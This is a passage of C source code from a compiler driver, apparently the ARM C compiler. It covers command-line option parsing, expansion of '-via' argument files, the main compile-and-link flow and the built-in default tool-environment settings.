AddArg(&ld_arg, "-d");
}
break;
case 'L': if (Compiling_On_Unix)
{ if (current[1] == 'l')
AddInclude(t, "-L.", &current[2]);
else
AddArg(&ld_arg, current);
}
else goto may_take_next_arg;
break;
case 'M': FortranUnimplementedOption('m', current);
if (Compiling_On_Unix && current[1] == 'm') /* request link map */
AddArg(&ld_arg, current);
else
switch(safe_toupper(current[2]))
{
case 'X': if (current[3] != 0) goto defolt;
tooledit_insert(t, "-M", "=<");
flags &= ~KEY_LINK;
break;
case '\0': tooledit_insert(t, "-M", "?");
flags &= ~KEY_LINK;
break;
case 'D': if (current[3] == '\0' ||
current[3] == '-' && current[4] == 0)
{ tooledit_insert(t, "-M", "=D");
if (current [3] == 0) flags |= KEY_MD;
break;
}
default:
defolt: if (!ignoreerrors) bad_option(current);
}
break;
case 'P': uc_opt = safe_toupper(current[2]);
switch(uc_opt)
{
case '\0': flags |= KEY_PROFILE;
break;
case 'G':
case 'X': if (current[3] == '\0')
{ flags |= KEY_XPROFILE;
break;
}
default: if (!ignoreerrors) bad_option(current);
return usednext;
}
if (current[2] == 0)
tooledit_insert(t, "-p", "?");
else
tooledit_insertwithjoin(t, "-p", '=', &current[2]);
/* Switch to the profiled libraries when they are configured. */
if (setupenv.profile_lib[0] != '\0')
setupenv.default_lib = setupenv.profile_lib;
if (setupenv.fort_profile_lib[0] != '\0')
setupenv.fort_lib = setupenv.fort_profile_lib;
break;
#ifndef FORTRAN
case 'R':
if (Compiling_On_Unix && current[1] == 'r')
AddArg(&ld_arg, "-r"); /* X/Open compliance */
else {
#ifdef PASCAL /*ECN*/
EnvFlagSet(t, &current[2], 'r', "acdnpr", ignoreerrors);
#else
tooledit_insert(t, ".rolits", "=-f+w");
#endif
if (Compiling_On_Unix) flags |= KEY_READONLY;
}
break;
#endif
case 'S':
if (Compiling_On_Unix && current[1] == 's')
AddArg(&ld_arg, "-s");
else {
flags = (flags & ~KEY_LINK) | KEY_ASM_OUT;
tooledit_insert(t, ".asm_out","?");
}
break;
case 'W': if (current[2] == 0) {
/* bare -W: suppress the default warning set */
EnvFlagSet(t, "adfgilnprv", 'W', "acdfgilmnoprstuvz", ignoreerrors);
tooledit_insert(t, ".nowarn", "=-W");
} else
EnvFlagSet(t, &current[2], 'W', "acdfgilmnoprstuvz", ignoreerrors);
break;
case 'Z': uc_opt = safe_toupper(current[2]);
switch(uc_opt)
{
case '\0': /* Pass on '-z' to the linker */
goto link_command;
case 'A': if (safe_toupper(current[3]) == 'P' && isdigit(current[4])) {
if (tooledit_insertwithjoin(t, "-zap", '=', &current[4]) != TE_Failed)
break;
}
#ifdef MIN_ALIGNMENT_CONFIGURABLE
else if (safe_toupper(current[3]) == 'S' && isdigit(current[4])) {
if (tooledit_insertwithjoin(t, "-zas", '=', &current[4]) != TE_Failed)
break;
} else if (safe_toupper(current[3]) == 'T' && isdigit(current[4])) {
if (tooledit_insertwithjoin(t, "-zat", '=', &current[4]) != TE_Failed)
break;
}
#endif
goto check_mcdep;
case 'C': tooledit_insert(t, ".schar", "=-zc");
break;
case 'I': if (isdigit(current[3]))
goto check_mcdep;
goto may_take_next_arg;
case 'Q': debug_set(&current[3]); break;
case 'O': tooledit_insert(t, ".areaperfn", "=-zo");
break;
case '+': switch (safe_toupper(current[3])) {
case 'O': tooledit_insert(t, ".areaperfn", "=-z+o"); break;
case 'C': tooledit_insert(t, ".schar", "=-z+c"); break;
default: goto check_mcdep;
}
break;
#ifndef NO_DUMP_STATE
case 'G': switch (safe_toupper(current[3])) {
case 'W': tooledit_insertwithjoin(t, "-zgw", '=', &current[4]); break;
case 'R': tooledit_insertwithjoin(t, "-zgr", '=', &current[4]); break;
default: goto check_mcdep;
}
break;
#endif
case 'J': tooledit_insert(t, "-zj", "?");
break;
case 'P': if (isalpha(current[4])) {
/* keyword form: -zp<name>[...] looked up by spelling */
bool negate;
PragmaSpelling const *p = keyword_pragma(&current[3], &negate);
if (p != NULL) {
int32 val = p->value;
if (negate) {
#ifdef FORTRAN
if (pragchar == 'x' || pragchar == 'w')
val = ~val;
else
#endif
val = !val;
}
sprintf(b, "-zp%c", p->code);
/* %#lx requires unsigned long (was a signed (long) cast) */
sprintf(&b[8], "=%#lx", (unsigned long)val);
tooledit_insert(t, b, &b[8]);
}
} else {
/* literal form: -zp<char><value> */
sprintf(b, "-zp%c", current[3]);
tooledit_insertwithjoin(t, b, '=', &current[4]);
}
break;
case 'T': tooledit_insert(t, "-disallow_tentative_statics", "?");
break;
case 'Z': if (safe_toupper(current[3]) == 'T')
{
tooledit_insert(t, "-disallow_tentative_statics", "?");
current++;
}
tooledit_insertwithjoin(t, "-zz", '=', &current[3]);
break;
check_mcdep:
default: if (!mcdep_config_option(current[2], &current[3], t)) {
if (!ignoreerrors) cc_warn(warn_option, current);
}
break;
}
break;
link_command:
default:
#ifndef HOST_CANNOT_INVOKE_LINKER
AddArg(&ld_arg, current); break;
#else
if (!ignoreerrors) bad_option(current);
break;
#endif
#ifndef FORTRAN
case 'U':
#endif
case 'D':
may_take_next_arg:
/* Options whose argument may either be glued on (-Ifoo) or be the
 * next argv entry (-I foo).  -Z[IS] options always take the next
 * entry; the canonicalised uc_opt selects the action below. */
uc_opt = safe_toupper(current[1]);
if (uc_opt == 'Z')
{ uc_opt = safe_toupper(current[2]);
if (uc_opt == 'I') uc_opt = 'S'; else uc_opt = 'Z';
}
if (current[2] == 0 || uc_opt == 'S' ||
current[3] == 0 && uc_opt == 'Z')
{ if (nextarg == NULL) {
if (!ignoreerrors) cc_msg_lookup(driver_option_missing_arg, current);
++cmd_error_count;
break;
}
usednext = YES;
}
else if (uc_opt == 'Z')
nextarg = &current[3];
else
nextarg = &current[2];
switch (uc_opt)
{
#ifdef COMPILING_ON_UNIX
case 'E': /* actually can only be "-e" here... X/Open */
#endif
case 'U':
if (Compiling_On_Unix && current[1] != uc_opt) /* e or u */
{ char *next = join_strs("-e ", nextarg);
next[1] = current[1];
AddArg(&ld_arg, next); /* X/Open */
break;
} /* 'U' falls through */
sprintf(b, "-D%s", nextarg);
tooledit_insert(t, b, "=");
break;
case 'D': AddDefine(t, nextarg);
break;
case 'I': AddInclude(t, "-I.", nextarg);
break;
case 'J': AddInclude(t, "-J.", nextarg);
break;
#ifndef HOST_CANNOT_INVOKE_LINKER
case 'L': AddInclude(t, "-L.", nextarg);
break;
#endif
case 'O': flags |= KEY_RENAME;
{ UnparsedName unparse;
fname_parse(nextarg, FNAME_SUFFIXES, &unparse);
setupenv.output_file = copy_unparse(&unparse, NULL);
}
break;
case 'S': /* -ZI<system> file */
tooledit_insertwithjoin(t, "-ZS", '=', &current[3]);
tooledit_insertwithjoin(t, "-ZI", '=', nextarg);
break;
case 'Z': tooledit_insertwithjoin(t, "-zz", '=', nextarg);
break;
}
}
driver_flags = flags;
return usednext;
}
/*
* Extract compilation options from the command line.
*/
/* A whole-word driver keyword: either sets bits in driver_flags (key)
 * or records envname=envval in the tool environment.  KEY_NEXT marks
 * keywords that consume the following argv entry. */
typedef struct { char const *name; int32 key; char const *envname; char const *envval; } KW;
static KW const keytab[] = {
{"-help", KEY_HELP, NULL, NULL},
{"-h", KEY_HELP, NULL, NULL},
{"-verify", KEY_VERIFY, NULL, NULL},
{"-echo", 0, ".echo", "=-echo"},
{"-link", KEY_LINK, NULL, NULL},
{"-list", KEY_LISTING, NULL, NULL},
{"-errors", KEY_NEXT+KEY_ERRORSTREAM, NULL, NULL},
{"-via", KEY_NEXT+KEY_VIAFILE, NULL, NULL},
/* remaining members are implicitly NULL for this entry */
{"-config", KEY_CONFIG},
#ifdef TARGET_ENDIANNESS_CONFIGURABLE
{"-littleend", 0, ".bytesex", "=-li"},
{"-li", 0, ".bytesex", "=-li"},
{"-bigend", 0, ".bytesex", "=-bi"},
{"-bi", 0, ".bytesex", "=-bi"},
#endif
#if defined(PASCAL) /*ECN*/
{"-iso", 0, ".lang", "-iso"},
{"-arthur", KEY_HOST_LIB, NULL, NULL},
{"-super", KEY_HOST_LIB, NULL, NULL},
{"-counts", KEY_COUNTS+KEY_LISTING, NULL, NULL},
#elif defined(FORTRAN)
# ifndef TARGET_IS_UNIX
{"-bsd", KEY_PCC, NULL, NULL},
# endif
{"-onetrip", KEY_ONETRIP, NULL, NULL},
{"-fussy", KEY_STRICT, NULL, NULL},
{"-f66", KEY_F66, NULL, NULL},
{"-strict", KEY_STRICT, NULL, NULL},
{"-extend", KEY_LONGLINES, NULL, NULL},
#else /* not FORTRAN or PASCAL */
{"-ansi", 0, ".lang", "=-ansi"},
{"-ansic", 0, ".lang", "=-ansi"},
{"-pcc", 0, ".lang", "=-pcc"},
{"-fussy", 0, ".lang", "=-strict"},
{"-strict", 0, ".lang", "=-strict"},
{"-pedantic", 0, ".lang", "=-strict"},
#ifdef CPLUSPLUS
{"-cfront", 0, ".lang", "=-cfront"},
{"-cpp", 0, ".lang", "=-cpp"},
#endif
{"-arthur", KEY_HOST_LIB, NULL, NULL},
{"-super", KEY_HOST_LIB, NULL, NULL},
{"-counts", KEY_COUNTS+KEY_LISTING, NULL, NULL},
# ifdef FOR_ACORN
{"-throwback", KEY_THROWBACK, NULL, NULL},
{"-desktop", KEY_NEXT+KEY_DESKTOP, NULL, NULL},
{"-depend", KEY_NEXT+KEY_DEPEND, NULL, NULL},
{"-c++", KEY_CFRONTPREPROCESS, NULL, NULL},
# endif
# ifdef RISCiX113
{"-riscix1.2", KEY_RIX120, NULL, NULL},
# endif
#endif /* PASCAL */
};
static KW const *keyword(const char *string)
{
unsigned count;
for (count = 0; count < sizeof(keytab)/sizeof(keytab[0]); ++count)
if (cistreq(string, keytab[count].name))
return &keytab[count];
return NULL;
}
/* Cursor over an in-memory string, used as a mapvia input source. */
typedef struct {
char const *s;   /* the string being read */
Uint i;          /* index of the next character */
} ViaSRec;
/* getc-style callback for mapvia: return the next character of the
 * string, or EOF at the terminating NUL (without advancing past it). */
static int vias_getc(void *arg) {
ViaSRec *p = (ViaSRec *)arg;
int ch = p->s[p->i];
if (ch == 0) return EOF;
p->i++;
return ch;
}
/* getc-style callback for mapvia when the input source is a stdio
 * stream: returns the next character, or EOF at end of file. */
static int via_getc(void *arg) {
    FILE *stream = (FILE *)arg;
    return fgetc(stream);
}
/* Split an input source (read one character at a time via getcfn) into
 * whitespace-separated words, honouring single/double quotes, and
 * expand nested "-via <file>" references recursively.  Runs in two
 * modes: with newargv==NULL it only counts the words; otherwise it
 * stores a permanent copy of each word into newargv.  Returns the
 * number of words produced.  A NULL source (e.g. a via file that
 * failed to open) is reported and aborts the compiler. */
static int mapvia(
void *v, int (*getcfn)(void *), char const *viafile, char **newargv)
{ int ch, newargc;
bool got_via = NO;
char word[128];
if (v == NULL)
{ cc_msg_lookup(driver_via_not_opened, viafile);
compiler_exit(1);
}
for (newargc = 0, ch = ' ';;)
{ unsigned p = 0;
while (ch != EOF && isspace(ch)) ch = getcfn(v);
if (ch == EOF) break;
if (ch == '"' || ch == '\'') {
/* quoted word: take everything up to the matching quote */
int quote = ch;
for (;;) {
ch = getcfn(v);
if (ch == EOF || ch == quote) break;
if (p < (sizeof(word)-1)) word[p++] = ch;
}
} else
do
{ if (p < (sizeof(word)-1)) word[p++] = ch;
ch = getcfn(v);
} while (ch != EOF && !isspace(ch));
word[p] = 0;   /* words longer than 127 chars are silently truncated */
if (got_via)
{ /* previous word was "-via": this word names a file to expand.
   * If fopen fails, the recursive call sees NULL and exits, so
   * fclose below never receives NULL. */
FILE *f = fopen(word, "r");
newargc += mapvia(f, via_getc, word, newargv==NULL ? NULL : newargv+newargc);
fclose(f);
got_via = NO;
}
else if (cistreq(word, "-via"))
got_via = YES;
else
{ if (newargv != NULL) {
size_t len = strlen(word)+1;
newargv[newargc] = (char *)memcpy(PermAlloc((int32)len), word, len);
}
++newargc;
}
}
return newargc;
}
/* Walk argv[count..argc-1]: whole-word keywords (keytab), then
 * target-specific keywords (mcdep_keyword), then single-letter '-'
 * options (HandleArg); anything else is a file name (cc_fil).
 * "-via <file>" splices the file's words into the scan by rebuilding
 * argv in place.  Finally reconciles -O with -g via ogflags. */
static void read_options(
int count, int argc, char **argv, ToolEnv *t, bool ignoreerrors) {
for (; count < argc; ++count)
{ char const *arg = argv[count];
KW const *key = keyword(arg);
if (key == NULL)
{ /* not in keytab: give the target-specific handler first refusal */
KW_Status status = mcdep_keyword(arg, argv[count+1], t);
if (status == KW_OKNEXT) {
count++;   /* the target keyword consumed its argument */
continue;
} else if (status == KW_OK) {
continue;
} else if (status != KW_NONE) {
if (!ignoreerrors) {
cc_msg_lookup(driver_option_bad1);
cc_msg("'%s", arg);
if (status == KW_BADNEXT)
cc_msg(" %s", argv[++count]);
cc_msg("'"); /* makes NLS string more sensible */
cc_msg_lookup(driver_option_bad2);
}
++cmd_error_count;
continue;
}
} else if (key->envname != NULL) {
/* keyword mapping to an environment setting; ".lang" needs
 * special merging so "-strict" composes with a dialect. */
char b[64];
char const *s = key->envval;
if (StrEq(key->envname, ".lang")) {
char const *val = toolenv_lookup(t, key->envname);
if (StrEq(key->envval, "=-strict")) {
if (strchr(val, ' ') == NULL) {
strcpy(b, val);
strcat(b, " -strict");
s = b;
}
} else if (StrEq(val, "=-strict")) {
strcpy(b, key->envval);
strcat(b, " -strict");
s = b;
}
}
tooledit_insert(t, key->envname, s);
continue;
} else {
if (key->key & KEY_NEXT) {
if (++count >= argc) {
if (ignoreerrors)
return;
else {
cc_msg_lookup(driver_option_missing_filearg, arg);
compiler_exit(1);
}
}
#ifdef FOR_ACORN
if (key->key & KEY_DEPEND) {
tooledit_insert(t, "-M", "=+");
tooledit_insertwithjoin(t, ".depend", '=', argv[count]);
}
else if (key->key & KEY_DESKTOP)
dde_desktop_prefix = argv[count];
else
#endif
if (key->key & KEY_ERRORSTREAM) {
/* -errors <file>: redirect diagnostics */
if (!ignoreerrors) {
errors = fopen(argv[count], "w");
if (errors == NULL) {
cc_msg_lookup(driver_cant_open_output, argv[count]);
compiler_exit(1);
}
}
argv[count] = NULL;
} else if (key->key & KEY_VIAFILE) {
/* -via <file>: read it once to count words, then again to
 * build a replacement argv holding those words followed by
 * the unconsumed remainder of the old argv.  The scan then
 * restarts at index 1 of the new vector (slot 0 is unused,
 * mimicking a program name). */
FILE *v = fopen(argv[count], "r");
int n = mapvia(v, via_getc, argv[count], NULL);
if (n < 0) {
if (ignoreerrors)
return;
else
compiler_exit(1);
}
if (n == 0)
++count;
else {
char **newargv = (char **)
PermAlloc(sizeof(char *) * ((int32)argc - count + n + 1));
int j;
fseek(v, 0L, SEEK_SET);
n = mapvia(v, via_getc, NULL, &newargv[1]);
for (j = count; ++j < argc;)
newargv[++n] = argv[j];
newargv[++n] = NULL;
count = 0;
argc = n;
argv = newargv;
}
fclose(v);
}
}
#if defined(FORTRAN) && !defined(TARGET_IS_UNIX)
else if (key->key == KEY_PCC)
pragmax_flags = RISCIX_FORTRAN_PRAGMAX;
#endif
#ifdef FOR_ACORN
else if (key->key & KEY_THROWBACK)
dde_throwback_flag = 1;
else if (key->key & KEY_CFRONTPREPROCESS)
cplusplus_flag = 1;
#endif
else if (key->key & KEY_COUNTS) {
tooledit_insert(t, "-K", "?");
driver_flags |= key->key;
} else
driver_flags |= key->key;
continue;
}
/* not a keyword argument */
if (arg[0] == '-') {
if (HandleArg(t, arg, argv[count+1], ignoreerrors))
count++;   /* the option consumed the following argument */
} else {
AddArg(&cc_fil, arg);
}
}
/* -O was given: enable optimisation; if -g was also given without an
 * explicit -gx, restrict debug optimisation info to 'o'. */
if (ogflags & OG_O) {
tooledit_insert(t, "-zpz", "=1");
if (ogflags & OG_G && !(ogflags & OG_GX))
tooledit_insert(t, "-gx", "=o");
}
#ifdef PASCAL /*ECN*/
driver_flags |= KEY_ANSI;
#endif
}
/* Split a single string of options (e.g. from an environment variable)
 * into words and process them exactly like command-line arguments.
 * The string is scanned twice with mapvia: once to count the words,
 * once to fill an argv-style vector for read_options. */
void TE_DecodeArgumentLine(ToolEnv *t, char const *s, bool ignoreerrors) {
    ViaSRec src;
    int words;
    src.s = s;
    src.i = 0;
    words = mapvia(&src, vias_getc, NULL, NULL);
    if (words < 0) compiler_exit(1);
    if (words != 0) {
        char **vec = (char **)PermAlloc(sizeof(char *) * ((int32)words+1));
        src.i = 0;
        words = mapvia(&src, vias_getc, NULL, vec);
        vec[words] = NULL;
        read_options(0, words, vec, t, ignoreerrors);
    }
}
/* Apply the defaults that depend on what the command line did NOT
 * specify: add the default system include path when no -J was given,
 * and the default libraries when no -L was given (always, on Unix). */
static void FinishedOptions(ToolEnv *t) {
#ifdef RISCiX113
if (!(driver_flags & KEY_RIX120))
tooledit_insert(t, "-D__type", "==___type");
#endif
if (FindLast(t, "-J.") == 0) {
/*
 * No -J so add default system path to -I list
 */
#ifdef PASCAL
const char *path = setupenv.include_pas_path;
#else
const char *path = setupenv.include_pcc_path;
# ifdef RISCiX113
/* NOTE(review): `flags` is not declared in this function — in the
 * RISCiX113-only branches this presumably should read driver_flags;
 * confirm against a RISCiX113 build. */
if (((flags & KEY_ANSI) || !(flags & (KEY_PCC))) &&
!(flags & KEY_RIX120))
path = setupenv.include_ansi_path;
# endif
#endif
AddInclude(t, "-I.", path);
}
/* If compiling on Unix and in Ansi mode add extra libraries. */
/*
 * ACN: Oh misery - if I am compiling and linking under Unix, but to generate
 * Helios binaries, I do not want to scan the extra libraries indicated
 * here. I think the problem here is mostly because TARGET_IS_HELIOS
 * improperly sets the KEY_UNIX bit in flags - but to invent a KEY_HELIOS
 * would also be some work since elsewhere in this code there seems
 * to be a dichotomy assumed between Unix and Risc-OS...
 * AM: except for this file the alternative of MVS should be possible!
 * Thus the conditional
 * compilation here seems (in the short term) my easiest way out.
 */
#ifdef RISCiX113
if (((flags & KEY_ANSI) || !(flags & (KEY_PCC))) &&
!(flags & KEY_RIX120))
{
AddInclude(t, "-L.", "ansi");
AddInclude(t, "-L.", "m");
}
#endif
if (FindLast(t, "-L.") == 0 || Compiling_On_Unix)
AddInclude(t, "-L.", setupenv.default_lib);
}
/*
* Main.
*/
/* Prepare an ArgV to hold up to n argument strings: allocate the
 * backing vector, record its capacity, and start it empty. */
static void InitArgV(ArgV *p, int n) {
    p->n = 0;
    p->sz = n;
    p->v = (char const **)PermAlloc(n * sizeof(char const *));
}
/* Saved copy of the name this compiler was invoked under (argv[0] leaf). */
static char *progname_copy;
/* Report the invocation name, for use in diagnostics. */
char const *compiler_name(void) { return progname_copy; }
/* Allocator shim adapting PermAlloc to trackfile_initialise's callback type. */
static void *falloc(size_t n) { return PermAlloc(n); }
/* Main driver entry: initialise global state, parse options, echo the
 * command line if requested, compile the named files (or stdin), then
 * optionally invoke the linker.  Exits via compiler_exit(), which
 * longjmps back to cc(); the trailing 'return 0' is never reached.
 * NOTE(review): under the Unix+FORTRAN branch 'p' and 'default_output'
 * are not declared yet are referenced later in this function --
 * presumably that configuration differs elsewhere; confirm it builds.
 */
static int cc_main(int argc, char **argv, ToolEnv *t)
{
    char *progname;
    bool is_cpp = NO;
#if (defined(COMPILING_ON_UNIX) && defined(FORTRAN))
    progname = "f77"; /* rather than the "f77comp" we would get from argv[0] */
#else
    char p[32];
    char *default_output = setupenv.output_file;
#endif
    /* Reset per-run global compiler state. */
    errors = NULL;
    sysdebugmask = 0;
    syserr_behaviour = 0;
    aetree_debugcount = 0;
#ifdef ENABLE_CSE
    cse_debugcount = 0;
#endif
    localcg_debugcount = 0;
#ifdef TARGET_HAS_DEBUGGER
    usrdbgmask = 0;
#endif
    alloc_initialise();
    trackfile_initialise(falloc);
    errstate_initialise();
    progname = program_name(argv[0], p, 32);
    progname_copy = PermString(progname);
#ifdef TIME_LIMIT
    /* Time-limited evaluation build: refuse to run after expiry. */
    if (time(0) > TIME_LIMIT) {
        fprintf(stderr, "This time-limited software has expired.\nPlease contact "
                VENDOR_NAME /* specified in options.h */
                " for an up to date release.\n");
        compiler_exit(99);
    }
#endif
    main_error_count = cmd_error_count = 0;
#ifdef CHECK_AUTHORIZED
    check_authorized();
#endif
#ifdef NLS
    msg_init(argv[0], MSG_TOOL_NAME);
#endif
#ifndef HOST_WANTS_NO_BANNER
    cc_msg_lookup(driver_banner);
#endif
    /* Install interrupt handlers host-dependently; on Unix, do not
     * override handlers the parent already set to SIG_IGN. */
#ifndef COMPILING_ON_UNIX
#ifndef COMPILING_ON_MSDOS
    (void) signal(SIGINT, compile_abort);
#else /* DOS, Windows, Win32 */
    (void) signal(SIGTERM, compile_abort);
#endif
#else
# ifdef DRIVER_PRE_RELEASE_MSG
    cc_msg_lookup(driver_prerelease);
# endif
#ifndef COMPILING_ON_MSDOS
    /* The signal ignore state can be inherited from the parent... */
    if (signal(SIGINT, SIG_IGN) != SIG_IGN)
        (void) signal(SIGINT, compile_abort);
#ifdef SIGHUP
    if (signal(SIGHUP, SIG_IGN) != SIG_IGN)
        (void) signal(SIGHUP, compile_abort);
#endif
    if (signal(SIGTERM, SIG_IGN) != SIG_IGN)
        (void) signal(SIGTERM, compile_abort);
#endif
#endif
    get_external_environment();
    driver_flags = setupenv.initial_flags;
#ifdef FORTRAN
    pragmax_flags = setupenv.initial_pragmax;
#endif
    if (argc == 1)
    {   /* used with no argument */
        give_help(progname);
        compiler_exit(1);
    }
    /* Invoked under the name "cpp"?  Then behave as 'cc -E'. */
    { UnparsedName un;
      fname_parse(argv[0], ".exe .EXE" , &un);
      if (un.rlen == 3 &&
          (StrnEq(un.root, "cpp", 3) ||
           StrnEq(un.root, "CPP", 3)))
      {
          /* The compiler was called as '...cpp' - treat as 'cc -E'. */
          driver_flags = (driver_flags | KEY_PREPROCESS) & ~KEY_LINK;
          tooledit_insert(t, ".pp_only", "?");
      }
    }
    InitArgV(&cc_arg, argc);
    InitArgV(&cc_fil, argc);
    InitArgV(&ld_arg, argc);
    InitArgV(&ld_fil, argc);
    /* Apply any saved ".etc" options before the real command line, so
     * the command line can override them.  The value is skipped past
     * its first character (presumably the '=' tag; confirm). */
    { char const *etc = toolenv_lookup(t, ".etc");
      if (etc != NULL) TE_DecodeArgumentLine(t, &etc[1], NO);
    }
    read_options(1, argc, argv, t, NO);
#ifdef FOR_ACORN
    if (!(driver_flags & KEY_CFRONTPREPROCESS))
        /* IDJ: 06-Jun-94: banner if not -c++ */
        cc_msg_lookup(driver_banner);
#endif
    validate_flags();
    if (driver_flags & KEY_HELP)
    {   give_help(progname);
        compiler_exit(0);
    }
    /* -config: just persist the installation delta and exit. */
    if (driver_flags & KEY_CONFIG)
    {   if (toolenv_putinstallationdelta(t) != 0)
        {   cc_msg_lookup(driver_toolenv_writefail);
            compiler_exit(EXIT_error);
        }
        compiler_exit(0);
    }
    FinishedOptions(t);
    /* -echo: print the effective command line in brackets, prefixed by
     * argv[0]; fall back to a malloc'd buffer when it exceeds the
     * 256-byte stack buffer. */
    { char const *echoval = toolenv_lookup(t, ".echo");
      if (echoval != NULL && StrEq(echoval, "=-echo")) {
        size_t atstart = 1;
        char line[256];
        char *dynline = NULL;
        char *linep = line;
        int len;
        if (argv[0] != NULL) atstart += strlen(argv[0])+1;
        len = tooledit_getcommandline(t, line+atstart, 254-atstart);
        if (len > (int)(254-atstart)) {
            dynline = (char *)malloc(len+2+atstart);
            len = tooledit_getcommandline(t, dynline+atstart, len+2);
            linep = dynline;
        }
        linep[0] = '[';
        if (argv[0] != NULL) {
            strcpy(linep+1, argv[0]);
            linep[atstart-1] = ' ';
        }
        linep[len+atstart-1] = ']';
        linep[len+atstart] = '\n';
        linep[len+atstart+1] = 0;
        cc_msg(linep);
        if (dynline != NULL) free(dynline);
      }
    }
    set_flag_options(t);
    /* Preprocess-only mode: a second file argument names the output;
     * more than two file arguments is diagnosed. */
    if (toolenv_lookup(t, ".pp_only") != NULL)
    {   is_cpp = YES;
        if (cc_fil.n >= 2)
        {   if (cc_fil.n > 2)
                cc_msg_lookup(driver_cpp_toomanyfileargs);
            if (freopen(cc_fil.v[1], "w", stdout) == NULL)
            {   cc_msg_lookup(driver_cpp_cantopenoutput, cc_fil.v[1]);
                compiler_exit(EXIT_error);
            }
            cc_fil.n = 1;
        }
    }
    if (cc_fil.n > 0)
    {
        if (driver_flags & KEY_STDIN)
            cc_msg_lookup(driver_stdin_otherfiles);
        process_file_names(t, &cc_fil);
    }
    else if (is_cpp || (driver_flags & KEY_STDIN))
    {   /* Compile from stdin; on failure remove any partial output. */
        char *output_file = setupenv.output_file == default_output ? NULL :
                                                    setupenv.output_file;
        /* was: output_file = setupenv.output_file; but writes asm to a.out */
        /* we need to separate the differing uses of "output_file". */
#ifdef DEFAULT_STDIN_OBJECT
        if (!(driver_flags & (KEY_PREPROCESS|KEY_MAKEFILE|KEY_ASM_OUT)) &&
            setupenv.output_file == NULL)
            output_file = DEFAULT_STDIN_OBJECT;
#endif
        if (ccom(t, "-", output_file, NULL, NULL))
        {   ++main_error_count;
            if (output_file != NULL)
#ifdef COMPILING_ON_RISC_OS
            /* The next line is dirty and should be done by checking return code, */
            /* not peeking at other's variables. */
            if (errorcount) /* only delete o/p file if serious errors */
#endif
                remove(output_file);
        }
    }
    else cc_msg_lookup(driver_noeffect, progname);
#ifndef HOST_CANNOT_INVOKE_LINKER
# ifdef LINKER_IS_SUBPROGRAM
    /* IJR: hack to ensure that path gets passed to linker in argv[0] for NLS */
    { UnparsedName un;
      size_t n;
      char *new_name;
      fname_parse(argv[0], "" , &un);
      un.root = setupenv.link_cmd;
      un.rlen = strlen(un.root);
      n = un.vlen + un.plen + un.rlen + un.elen + 10;
      new_name = (char *)PermAlloc(n);
      if (fname_unparse(&un, FNAME_AS_NAME, new_name, n) < 0)
          driver_abort("internal fault in \"copy_unparse\""); /* @@@ syserr? */
      setupenv.link_cmd = new_name;
    }
# endif
    /* Link only if everything compiled cleanly and -c was not given. */
    if (main_error_count == 0 && (driver_flags & KEY_LINK) && ld_fil.n > 0)
        linker(t, driver_flags);
#endif
    /*
     * The SUN ignores the return value from main so exit() instead
     */
    compiler_exit(main_error_count + cmd_error_count > 0 ? EXIT_error : 0);
    return 0;
}
/* Tool-harness execution entry point.  Stashes the backchat callback,
 * then runs cc_main() under a setjmp so that compiler_exit() (which
 * longjmps to exitbuf) unwinds cleanly; its status code becomes the
 * return value of this function.
 */
static int cc(int argc, ArgvType *argv, ToolEnv *t,
              backchat_Messenger *sendmsg, void *backchathandle)
{   int status;
    backchat.send = sendmsg;
    backchat.handle = backchathandle;
    status = setjmp(exitbuf);
    if (status == 0)
        status = cc_main(argc, argv, t);
    else
        /* Arrived here via longjmp from compiler_exit(). */
        status = compiler_exit_status;
    return status;
}
/* Name under which this tool registers its environment. */
char const *toolenv_toolname(void)
{
    return MSG_TOOL_NAME;
}
/* Cached copy of the default environment (see toolenv_insertdefaults). */
ToolEnv *cc_default_env;

/* Tool-harness finalise hook: release the cached default environment. */
static int cc_finalise(ToolEntryPoints const *te) {
    IGNORE(te);
    if (cc_default_env != NULL)
        toolenv_dispose(cc_default_env);
    return 0;
}
/* Merge delta into t, renormalising the ".etc" entry on success.
 * Allocation is bracketed because this may be called standalone
 * through the tool entry-point table. */
static int MergeEnv(ToolEnv *t, ToolEnvDelta delta) {
    int status;
    alloc_initialise();
    status = toolenv_merge(t, delta);
    if (status == 0)
        TE_NormaliseEtc(t);
    alloc_finalise();
    return status;
}
/* Interactive environment editor hook: delegate to Tool_EditEnv with
 * allocation bracketed, returning its status. */
static int CC_EditEnv(ToolEnv *t, HWND wh) {
    int status;
    alloc_initialise();
    status = Tool_EditEnv(t, wh);
    alloc_finalise();
    return status;
}
/* Table of operations exported to the tool harness via armccinit(). */
static ToolEntryPoints const entries = {
    cc_finalise,                  /* shut down: free cached state */
    cc,                           /* execute the compiler */
    toolenv_new,
    toolenv_dispose,
    MergeEnv,                     /* merge a delta, renormalising .etc */
    toolenv_mark,
    toolenv_getdelta,
    toolenv_putinstallationdelta,
    CC_EditEnv,                   /* interactive environment editor */
    NULL
};
/* Harness initialisation entry point: reset the cached default
 * environment and hand back this tool's entry-point table. */
const ToolEntryPoints *armccinit(void) {
    cc_default_env = NULL;
    return &entries;
}
typedef struct {
char const *name;
char const *val;
} EnvItem;
/* Default byte sex option for the target: "=-bi" (big-endian) when
 * TARGET_DEFAULT_BIGENDIAN is defined and non-zero, else "=-li". */
#ifdef TARGET_DEFAULT_BIGENDIAN
# if TARGET_DEFAULT_BIGENDIAN
# define BYTESEX_DEFAULT_STR "=-bi"
# else
# define BYTESEX_DEFAULT_STR "=-li"
# endif
#else
# define BYTESEX_DEFAULT_STR "=-li"
#endif
/* Two-level stringize so macro arguments are expanded before quoting. */
#define str(s) #s
#define xstr(s) str(s)
/* Built-in default ToolEnv entries, inserted by toolenv_insertdefaults().
 * Many warning/error entries (.Ex / .Wx) are selected at compile time
 * from the D_SUPPRESSED diagnostic mask, so this table encodes the
 * build's default diagnostic settings; "?" marks an entry that is
 * present but carries no value. */
static EnvItem const builtin_defaults[] = {
    {".bytesex", BYTESEX_DEFAULT_STR},
    /* Source language default depends on the build variant. */
#if defined(CPLUSPLUS)
    {".lang", "=-cpp"},
#elif defined(TARGET_IS_UNIX)
    {".lang", "=-fc"},
#else
    {".lang", "=-ansi"},
#endif
#if (D_SUPPRESSED & D_IMPLICITCAST)
    {".Ec", "=-Ec"},
#else
    {".Ec", "=-E+c"},
#endif
#if (D_SUPPRESSED & D_PPALLOWJUNK)
    {".Ep", "=-Ep"},
#else
    {".Ep", "=-E+p"},
#endif
#if (D_SUPPRESSED & D_ZEROARRAY)
    {".Ez", "=-Ez"},
#else
    {".Ez", "=-E+z"},
#endif
#if (D_SUPPRESSED & D_CAST)
    {".Ef", "=-Ef"},
#else
    {".Ef", "=-E+f"},
#endif
